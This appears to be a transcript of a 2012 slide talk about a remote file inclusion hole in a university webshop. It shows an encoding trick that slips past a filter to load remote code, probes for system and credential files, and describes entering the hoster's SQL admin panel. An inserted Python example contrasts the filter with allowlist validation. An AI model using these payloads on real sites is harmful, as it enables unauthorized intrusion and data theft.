
Oops! How I accidentally hacked the University's Merchandising Shop - PowerPoint PPT Presentation



  1. Oops! How I accidentally hacked the University's Merchandising Shop
     Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 1

  2. About UniBwM
     ● University of the German Federal Armed Forces, Munich
     ● ~3700 students in 2011
     ● Corporate Design
     ● Sells shirts and stuff via student-driven webshop (image: UniBwM Press Archive)

  3. About Me
     ● Student of Computer Aided Engineering
     ● Assistant at Network Security department
     ● find them holes!
     ● www.danrl.de

  4. (image-only slide)

  5. (image slide; labels: static, dynamic)

  6. http://www.uni-fashion.de/index.php?inhalt=artikel.php&...

  7. A closer look
     ● That's a filename! http://www.uni-fashion.de/index.php?inhalt=artikel.php&...
     ● The filename is used to load dynamic content. Unfortunately, that's some bad kind of brainchild :(

  8. Behind the scenes
     (diagram: the Visitor requests index.php on the Webserver, which loads artikel.php)
     ● We call this technique File Inclusion

  9. Escalating
     ● Let's try some other filenames
     ● /etc/passwd
     ● /var/log/messages
     ● /root/.bash_history

  10. No success! (that's good from the security point of view)

  11. Remote File Inclusion
     (diagram: Attacker, Webserver with index.php and artikel.php, Evil Webserver hosting evil.php)
     ● Let's create some harmless code to include!

  12. (image-only slide)

  13. Raw Code (image slide)

  14. Fail! No success! (that's good from the security point of view)

  15. Difference makes a difference
     ● But wait... don't these error messages look different? What does that mean?
     (screenshots: Webserver Error vs. Website Error)

  16. Questions
     ● Why did the Remote File Inclusion attack fail?
     ● Why do local files generate other errors than remote files?
     (diagram: Request → "Filtering" by .htaccess "Rules" on the Webserver → index.php)

  17. No guts, no glory!
     ● =http is filtered

  18. Fail!
     ● =http is filtered

  19. Encoding issues
     ● In a URL one can write every character as %<HEX-ASCII>
     ● Same URL, different writing:
       http://uni-fashion.de/index.php?a=bc
       http://uni-fashion.de/index.php?a=%61%62
     ● Will the filter catch this one?
       http://uni-fashion.de/index.php?inhalt=%68ttp://pastebin.com/raw.php?i=XqcNB6hz (h written as %<HEX-ASCII>)

  20. Bazinga!

  21. Can you keep a secret?
     ● New code
     ● New URL
     ● Same game
     ● WTF?

  22. A few no-brainers
     ● Look up the hoster in WHOIS
     ● Find the URL of the hoster's SQL admin panel
     ● Log in with the correct password :)

  23. (image-only slide)

  24. My work here is done... Might be useful :)

  25. Lessons learned
     ● Always validate every user-based input!
     ● Seriously, do it!
     ● Do not fix bad code with filters, better repair your code!
     ● Never trust encoding!
     ● Use SSL for your SQL-Admin :)
     ● I can haz a free T-Shirt now?
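The two defences the deck contrasts (the "=http" filter of slides 17-19 and the "validate every input" lesson above), modelled in Python as an added example that is not the shop's code: a filter that string-matches the raw query string, which the percent-encoded request slips past, next to an allowlist check on the decoded parameter, which refuses local, remote and encoded inclusion alike. The extra page names in ALLOWED_PAGES and the evil.example host are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed model of the three stages in the talk (added example, not the shop's code):
#  1. a .htaccess-style rule that matches "=http" in the RAW, undecoded query string,
#  2. the application decoding the "inhalt" parameter before it reaches include(),
#  3. the real fix: validate the DECODED value against an allowlist of page names.

# Hypothetical allowlist; only artikel.php is named on the slides.
ALLOWED_PAGES = {"artikel.php", "warenkorb.php", "kontakt.php"}

def weak_filter_blocks(raw_query: str) -> bool:
    """The "=http is filtered" rule: a substring match on the undecoded query."""
    return "=http" in raw_query

def decoded_inhalt(raw_query: str) -> str:
    """What the PHP side actually sees: the percent-decoded 'inhalt' value."""
    return parse_qs(raw_query, keep_blank_values=True).get("inhalt", [""])[0]

def resolve_include(raw_query: str):
    """Decode first, then accept only an exact allowlisted name; None means reject.
    URLs (remote inclusion), anything containing a path separator (local files such
    as /etc/passwd) and unknown names are refused, whatever encoding was used."""
    page = decoded_inhalt(raw_query)
    if urlsplit(page).scheme or "/" in page or "\\" in page:
        return None
    return page if page in ALLOWED_PAGES else None

# Constructed requests mirroring the attempts on the slides; evil.example is a placeholder host.
REQUESTS = {
    "normal":  "inhalt=artikel.php&id=42",
    "local":   "inhalt=/etc/passwd",
    "remote":  "inhalt=http://evil.example/evil.php",
    "encoded": "inhalt=%68ttp://evil.example/evil.php",   # 'h' written as %68
}

def audit(raw_query: str) -> dict:
    """Side-by-side result of the weak filter and the allowlist for one request."""
    return {"weak_filter_blocks": weak_filter_blocks(raw_query),
            "decoded": decoded_inhalt(raw_query),
            "allowlist_accepts": resolve_include(raw_query)}

if __name__ == "__main__":
    for name, query in REQUESTS.items():
        print(f"{name:8} {audit(query)}")
```

Running it shows the filter blocking only the plain "remote" request while the allowlist rejects all three malicious variants and accepts only artikel.php.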

  26. Thanks! Questions?
